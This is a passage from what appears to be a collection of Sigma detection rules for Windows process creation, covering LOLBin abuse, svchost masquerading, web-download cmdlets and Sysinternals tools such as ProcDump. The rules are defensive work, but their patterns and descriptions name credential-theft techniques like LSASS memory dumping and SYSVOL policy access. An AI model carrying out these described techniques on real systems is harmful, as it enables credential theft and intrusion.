    "content": "title: Suspicious SYSVOL Domain Group Policy Access\nid: 05f3c945-dcc8-4393-9f3d-af65077a8f86\nstatus: test\ndescription: Detects Access to Domain Group Policies stored in SYSVOL\nreferences:\n    - https://adsecurity.org/?p=2288\n    - https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100\nauthor: Markus Neis, Jonhnathan Ribeiro, oscd.community\ndate: 2018-04-09\nmodified: 2022-01-07\ntags:\n    - attack.credential-access\n    - attack.t1552.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\SYSVOL\\'\n            - '\\policies\\'\n    condition: selection\nfalsepositives:\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_task_folder_evasion.yml",
    "content": "title: Tasks Folder Evasion\nid: cc4e02ba-9c06-48e2-b09e-2500cace9ae0\nstatus: test\ndescription: |\n    The Tasks folder in system32 and syswow64 are globally writable paths.\n    Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application\n    in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\nreferences:\n    - https://twitter.com/subTee/status/1216465628946563073\n    - https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26\nauthor: Sreeman\ndate: 2020-01-13\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.execution\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection1:\n        CommandLine|contains:\n            - 'echo '\n            - 'copy '\n            - 'type '\n            - 'file createnew'\n    selection2:\n        CommandLine|contains:\n            - ' C:\\Windows\\System32\\Tasks\\'\n            - ' C:\\Windows\\SysWow64\\Tasks\\'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml",
    "content": "title: Malicious Windows Script Components File Execution by TAEF Detection\nid: 634b00d5-ccc3-4a06-ae3b-0ec8444dd51b\nstatus: test\ndescription: |\n  Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\n  Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/\n    - https://twitter.com/pabraeken/status/993298228840992768\n    - https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/\nauthor: 'Agro (@agro_sev) oscd.community'\ndate: 2020-10-13\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\te.exe'\n        - ParentImage|endswith: '\\te.exe'\n        - OriginalFileName: '\\te.exe'\n    condition: selection\nfalsepositives:\n    - It's not an uncommon to use te.exe directly to execute legal TAEF tests\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml",
    "content": "title: Malicious PE Execution by Microsoft Visual Studio Debugger\nid: 15c7904e-6ad1-4a45-9b46-5fb25df37fd2\nstatus: test\ndescription: |\n  There is an option for the MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch a specified executable and attach a debugger.\n  This option may be used by adversaries to execute malicious code via a signed, verified binary.\n  The debugger is installed alongside the Microsoft Visual Studio package.\nreferences:\n    - https://twitter.com/pabraeken/status/990758590020452353\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/\n    - https://learn.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019\nauthor: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community\ndate: 2020-10-14\nmodified: 2022-10-09\ntags:\n    - attack.t1218\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\vsjitdebugger.exe'\n    reduction1:\n        Image|endswith: '\\vsimmersiveactivatehelper*.exe'\n    reduction2:\n        Image|endswith: '\\devenv.exe'\n    condition: selection and not (reduction1 or reduction2)\nfalsepositives:\n    - The process spawned by vsjitdebugger.exe is uncommon.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml",
    "content": "title: Suspicious Userinit Child Process\nid: b655a06a-31c0-477a-95c2-3726b83d649d\nstatus: test\ndescription: Detects a suspicious child process of userinit\nreferences:\n    - https://twitter.com/SBousseaden/status/1139811587760562176\nauthor: Florian Roth (Nextron Systems), Samir Bousseaden (idea)\ndate: 2019-06-17\nmodified: 2025-10-17\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\userinit.exe'\n    filter_main_netlogon:\n        CommandLine|contains: '\\netlogon\\'\n    filter_main_explorer:\n        - Image|endswith: '\\explorer.exe'\n        - OriginalFileName: 'explorer.exe'\n        - CommandLine: 'C:\\Windows\\Explorer.EXE'\n    filter_main_null:\n        Image: null\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrative scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_velociraptor_child_process.yml",
    "content": "title: Suspicious Velociraptor Child Process\nid: 4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c\nstatus: experimental\ndescription: Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attacks.\nreferences:\n    - https://news.sophos.com/en-us/2025/08/26/velociraptor-incident-response-tool-abused-for-remote-access/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-08-29\ntags:\n    - attack.command-and-control\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1219\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\Velociraptor.exe'\n    selection_child_vscode_tunnel:\n        CommandLine|contains|all:\n            - 'code.exe'\n            - 'tunnel'\n            - '--accept-server-license-terms'\n    selection_child_msiexec:\n        CommandLine|contains|all:\n            - 'msiexec'\n            - '/i'\n            - 'http'\n    selection_child_powershell:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - 'Invoke-WebRequest '\n            - 'IWR '\n            - '.DownloadFile'\n            - '.DownloadString'\n    # Add more child process patterns as needed\n    condition: selection_parent and 1 of selection_child_*\nfalsepositives:\n    - Legitimate administrators or incident responders might use Velociraptor to execute scripts or tools. However, the combination of Velociraptor spawning these specific processes with these command lines is suspicious. Tuning may be required to exclude known administrative actions or specific scripts.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml",
    "content": "title: Weak or Abused Passwords In CLI\nid: 91edcfb1-2529-4ac2-9ecc-7617f895c7e4\nstatus: test\ndescription: |\n    Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.\n    An example would be a threat actor creating a new user via the net command and providing the password inline\nreferences:\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments\n    - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\n    - https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/\n    - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-14\nmodified: 2024-02-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # Add more passwords\n            - '123456789'\n            - '123123qwE'\n            - 'Asd123.aaaa'\n            - 'Decryptme'\n            - 'P@ssw0rd!'\n            - 'Pass8080'\n            - 'password123' # Also covers PASSWORD123123! as seen in https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/\n            - 'test@202' # Covers multiple years\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the passwords by users via commandline (should be discouraged)\n    - Other currently unknown false positives\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml",
    "content": "title: Usage Of Web Request Commands And Cmdlets\nid: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d\nrelated:\n    - id: 1139d2e2-84b1-4226-b445-354492eba8ba\n      type: similar\n    - id: f67dbfce-93bc-440d-86ad-a95ae8858c90\n      type: obsolete\n    - id: cd5c8085-4070-4e22-908d-a5b3342deb74\n      type: obsolete\n    - id: 6e897651-f157-4d8f-aaeb-df8151488385\n      type: obsolete\nstatus: test\ndescription: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine\nreferences:\n    - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/\n    - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell\n    - https://learn.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps\nauthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger\ndate: 2019-10-24\nmodified: 2025-10-20\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '[System.Net.WebRequest]::create'\n            - 'curl '\n            - 'Invoke-RestMethod'\n            - 'Invoke-WebRequest'\n            - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring\n            - 'iwr '\n            # - 'Net.WebClient' # There are various other rules that cover this, so it is commented out\n            - 'Resume-BitsTransfer'\n            - 'Start-BitsTransfer'\n            - 'wget '\n            - 'WinHttp.WinHttpRequest'\n    condition: selection\nfalsepositives:\n    - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml",
    "content": "title: WhoAmI as Parameter\nid: e9142d84-fbe0-401d-ac50-3e519fb00c89\nstatus: test\ndescription: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)\nreferences:\n    - https://twitter.com/blackarrowsec/status/1463805700602224645?s=12\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-29\nmodified: 2022-12-25\ntags:\n    - attack.discovery\n    - attack.t1033\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '.exe whoami'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_workfolders.yml",
    "content": "title: Execution via WorkFolders.exe\nid: 0bbc6369-43e3-453d-9944-cae58821c173\nstatus: test\ndescription: Detects using WorkFolders.exe to execute an arbitrary control.exe\nreferences:\n    - https://twitter.com/elliotkillick/status/1449812843772227588\nauthor: Maxime Thiebaut (@0xThiebaut)\ndate: 2021-10-21\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\control.exe'\n        ParentImage|endswith: '\\WorkFolders.exe'\n    filter:\n        Image: 'C:\\Windows\\System32\\control.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate usage of the uncommon Windows Work Folders feature.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml",
    "content": "title: Suspect Svchost Activity\nid: 16c37b52-b141-42a5-a3ea-bbe098444397\nstatus: test\ndescription: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.\nreferences:\n    - https://web.archive.org/web/20180718061628/https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2\nauthor: David Burkett, @signalblur\ndate: 2019-12-28\nmodified: 2022-06-27\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|endswith: 'svchost.exe'\n        Image|endswith: '\\svchost.exe'\n    filter:\n        - ParentImage|endswith:\n              - '\\rpcnet.exe'\n              - '\\rpcnetp.exe'\n        - CommandLine: null  # no CommandLine value available\n    condition: selection and not filter\nfalsepositives:\n    - Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution.yml",
    "content": "title: Suspicious Process Masquerading As SvcHost.EXE\nid: be58d2e2-06c8-4f58-b666-b99f6dc3b6cd\nrelated:\n    - id: 01d2e2a1-5f09-44f7-9fc1-24faa7479b6d\n      type: similar\n    - id: e4a6b256-3e47-40fc-89d2-7a477edd6915\n      type: similar\nstatus: test\ndescription: |\n    Detects a suspicious process that is masquerading as the legitimate \"svchost.exe\" by naming its binary \"svchost.exe\" and executing from an uncommon location.\n    Adversaries often disguise their malicious binaries by naming them after legitimate system processes like \"svchost.exe\" to evade detection.\nreferences:\n    - https://tria.ge/240731-jh4crsycnb/behavioral2\n    - https://redcanary.com/blog/threat-detection/process-masquerading/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-08-07\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n    filter_main_img_location:\n        Image:\n            - 'C:\\Windows\\System32\\svchost.exe'\n            - 'C:\\Windows\\SysWOW64\\svchost.exe'\n    filter_main_ofn:\n        OriginalFileName: 'svchost.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml",
    "content": "title: Terminal Service Process Spawn\nid: 1012f107-b8f1-4271-af30-5aed2de89b39\nstatus: test\ndescription: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)\nreferences:\n    - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-05-22\nmodified: 2023-01-25\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.lateral-movement\n    - attack.t1210\n    - car.2013-07-002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentCommandLine|contains|all:\n            - '\\svchost.exe'\n            - 'termsvcs'\n    filter_img:\n        Image|endswith:\n            - '\\rdpclip.exe'\n            - ':\\Windows\\System32\\csrss.exe'\n            - ':\\Windows\\System32\\wininit.exe'\n            - ':\\Windows\\System32\\winlogon.exe'\n    filter_null:\n        Image: null\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_svchost_uncommon_command_line_flags.yml",
    "content": "title: Uncommon Svchost Command Line Parameter\nid: f17211f1-1f24-4d0c-829f-31e28dc93cdd\nstatus: experimental\ndescription: |\n    Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.\n    This could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.\nreferences:\n    - https://cardinalops.com/blog/the-art-of-anomaly-hunting-patterns-detection/\n    - https://www.security.com/threat-intelligence/blackbyte-exbyte-ransomware\n    - https://cloud.google.com/blog/topics/threat-intelligence/apt41-initiates-global-intrusion-campaign-using-multiple-exploits/\n    - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf\nauthor: Liran Ravich\ndate: 2025-11-14\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1036.005\n    - attack.t1055\n    - attack.t1055.012\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Example of command to simulate: \"C:\\Windows\\System32\\svchost.exe\" calc.exe\n        Image|endswith: '\\svchost.exe'\n    filter_main_flags:\n        CommandLine|re: '-k\\s\\w{1,64}(\\s?(-p|-s))?'\n    filter_main_empty:\n        CommandLine: ''\n    filter_main_null:\n        CommandLine: null\n    filter_optional_defender:\n        ParentImage|endswith: '\\MsMpEng.exe'\n        CommandLine|contains: 'svchost.exe'\n    filter_optional_mrt:\n        ParentImage|endswith: '\\MRT.exe'\n        CommandLine: 'svchost.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml",
    "content": "title: Uncommon Svchost Parent Process\nid: 01d2e2a1-5f09-44f7-9fc1-24faa7479b6d\nstatus: test\ndescription: Detects an uncommon svchost parent process\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-08-15\nmodified: 2022-06-28\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n    filter_main_generic:\n        ParentImage|endswith:\n            - '\\Mrt.exe'\n            - '\\MsMpEng.exe'\n            - '\\ngen.exe'\n            - '\\rpcnet.exe'\n            - '\\services.exe'\n            - '\\TiWorker.exe'\n    filter_main_parent_null:\n        ParentImage: null\n    filter_main_parent_empty:\n        ParentImage:\n            - '-'\n            - ''\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml",
    "content": "title: Permission Check Via Accesschk.EXE\nid: c625d754-6a3d-4f65-9c9a-536aea960d37\nstatus: test\ndescription: Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by Sysinternals and often abused by attackers to verify process privileges\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43\n    - https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW\n    - https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat\n    - https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat\nauthor: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-10-13\nmodified: 2023-02-20\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Product|endswith: 'AccessChk'\n        - Description|contains: 'Reports effective permissions'\n        - Image|endswith:\n              - '\\accesschk.exe'\n              - '\\accesschk64.exe'\n        - OriginalFileName: 'accesschk.exe'\n    selection_cli:\n        CommandLine|contains: # These are the most common flags used with this tool. You could add other combinations if needed\n            - 'uwcqv '\n            - 'kwsu '\n            - 'qwsu '\n            - 'uwdqs '\n    condition: all of selection*\nfalsepositives:\n    - System administrator usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml",
    "content": "title: Active Directory Database Snapshot Via ADExplorer\nid: 9212f354-7775-4e28-9c9f-8f0a4544e664\nrelated:\n    - id: ef61af62-bc74-4f58-b49b-626448227652\n      type: derived\nstatus: test\ndescription: Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.\nreferences:\n    - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html\n    - https://learn.microsoft.com/de-de/sysinternals/downloads/adexplorer\n    - https://github.com/c3c/ADExplorerSnapshot.py/tree/f700904defac330802bbfedd1d8ffd9248f4ee24\n    - https://www.packetlabs.net/posts/scattered-spider-is-a-young-ransomware-gang-exploiting-large-corporations/\n    - https://www.nccgroup.com/us/research-blog/lapsus-recent-techniques-tactics-and-procedures/\n    - https://trustedsec.com/blog/adexplorer-on-engagements\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-14\nmodified: 2025-07-09\ntags:\n    - attack.discovery\n    - attack.t1087.002\n    - attack.t1069.002\n    - attack.t1482\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\ADExp.exe'\n              - '\\ADExplorer.exe'\n              - '\\ADExplorer64.exe'\n              - '\\ADExplorer64a.exe'\n        - OriginalFileName: 'AdExp'\n        - Description: 'Active Directory Editor'\n        - Product: 'Sysinternals ADExplorer'\n    selection_cli:\n        CommandLine|contains: 'snapshot'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml",
    "content": "title: Suspicious Active Directory Database Snapshot Via ADExplorer\nid: ef61af62-bc74-4f58-b49b-626448227652\nrelated:\n    - id: 9212f354-7775-4e28-9c9f-8f0a4544e664\n      type: derived\nstatus: test\ndescription: Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.\nreferences:\n    - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html\n    - https://learn.microsoft.com/de-de/sysinternals/downloads/adexplorer\n    - https://github.com/c3c/ADExplorerSnapshot.py/tree/f700904defac330802bbfedd1d8ffd9248f4ee24\n    - https://www.packetlabs.net/posts/scattered-spider-is-a-young-ransomware-gang-exploiting-large-corporations/\n    - https://www.nccgroup.com/us/research-blog/lapsus-recent-techniques-tactics-and-procedures/\n    - https://trustedsec.com/blog/adexplorer-on-engagements\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-14\nmodified: 2025-07-09\ntags:\n    - attack.discovery\n    - attack.t1087.002\n    - attack.t1069.002\n    - attack.t1482\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\ADExp.exe'\n              - '\\ADExplorer.exe'\n              - '\\ADExplorer64.exe'\n              - '\\ADExplorer64a.exe'\n        - OriginalFileName: 'AdExp'\n        - Description: 'Active Directory Editor'\n        - Product: 'Sysinternals ADExplorer'\n    selection_flag:\n        CommandLine|contains: 'snapshot'\n    selection_paths:\n        CommandLine|contains:\n            # TODO: Add more suspicious paths\n            - '\\Downloads\\'\n            - '\\Users\\Public\\'\n            - '\\AppData\\'\n            - '\\Windows\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml",
    "content": "title: Potential Execution of Sysinternals Tools\nid: 7cccd811-7ae9-4ebe-9afd-cb5c406b824b\nrelated:\n    - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133\n      type: derived\nstatus: test\ndescription: Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools\nreferences:\n    - https://twitter.com/Moti_B/status/1008587936735035392\nauthor: Markus Neis\ndate: 2017-08-28\nmodified: 2024-03-13\ntags:\n    - attack.resource-development\n    - attack.t1588.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|windash: ' -accepteula'\n    condition: selection\nfalsepositives:\n    - Legitimate use of SysInternals tools\n    - Programs that use the same command line flag\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_livekd_execution.yml",
    "content": "title: Potential Memory Dumping Activity Via LiveKD\nid: a85f7765-698a-4088-afa0-ecfbf8d01fa4\nstatus: test\ndescription: Detects execution of LiveKD based on PE metadata or image name\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/livekd\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\livekd.exe'\n              - '\\livekd64.exe'\n        - OriginalFileName: 'livekd.exe'\n    condition: selection\nfalsepositives:\n    - Administration and debugging activity (must be investigated)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml",
    "content": "title: Kernel Memory Dump Via LiveKD\nid: c7746f1c-47d3-43d6-8c45-cd1e54b6b0a2\nstatus: test\ndescription: Detects execution of LiveKD with the \"-m\" flag to potentially dump the kernel memory\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/livekd\n    - https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/\n    - https://kb.acronis.com/content/60892\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-16\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\livekd.exe'\n              - '\\livekd64.exe'\n        - OriginalFileName: 'livekd.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' -m'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely in production environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml",
    "content": "title: Procdump Execution\nid: 2e65275c-8288-4ab4-aeb7-6274f58b6b20\nstatus: test\ndescription: Detects usage of the SysInternals Procdump utility\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-16\nmodified: 2023-02-28\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1003.001\n    - attack.credential-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\procdump.exe'\n            - '\\procdump64.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use of procdump by a developer or administrator\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml",
    "content": "title: Potential SysInternals ProcDump Evasion\nid: 79b06761-465f-4f88-9ef2-150e24d3d737\nstatus: test\ndescription: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name\nreferences:\n    - https://twitter.com/mrd0x/status/1480785527901204481\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-11\nmodified: 2023-05-09\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1003.001\n    - attack.credential-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains:\n            - 'copy procdump'\n            - 'move procdump'\n    selection_2:\n        CommandLine|contains|all:\n            - 'copy '\n            - '.dmp '\n        CommandLine|contains:\n            - '2.dmp'\n            - 'lsass'\n            - 'out.dmp'\n    selection_3:\n        CommandLine|contains:\n            - 'copy lsass.exe_'  # procdump default pattern e.g. lsass.exe_220111_085234.dmp\n            - 'move lsass.exe_'  # procdump default pattern e.g. lsass.exe_220111_085234.dmp\n    condition: 1 of selection_*\nfalsepositives:\n    - False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml",
    "content": "title: Potential LSASS Process Dump Via Procdump\nid: 5afee48e-67dd-4e03-a783-f74259dcf998\nstatus: stable\ndescription: |\n    Detects potential credential harvesting attempts through LSASS memory dumps using ProcDump.\n    This rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LSASS-related process markers.\n    LSASS (Local Security Authority Subsystem Service) contains sensitive authentication data including plaintext passwords, NTLM hashes, and Kerberos tickets in memory.\n    Attackers commonly dump LSASS memory to extract credentials for lateral movement and privilege escalation.\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump\n    - https://research.splunk.com/endpoint/3742ebfe-64c2-11eb-ae93-0242ac130002\n    - https://x.com/wietze/status/1958302556033065292?s=12\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-10-30\nmodified: 2025-10-19\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.credential-access\n    - attack.t1003.001\n    - car.2013-05-009\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_flags:\n        CommandLine|contains|windash:\n            - ' -ma '\n            - ' -mm ' # Mini dump\n            - ' -mp ' # Miniplus dump\n    selection_process:\n        CommandLine|contains:\n            - ' ls' # Short for lsass\n            - ' keyiso'\n            - ' samss'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely, because no one should dump an lsass process memory\n    - Another tool that uses command line flags similar to ProcDump\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexec_execution.yml",
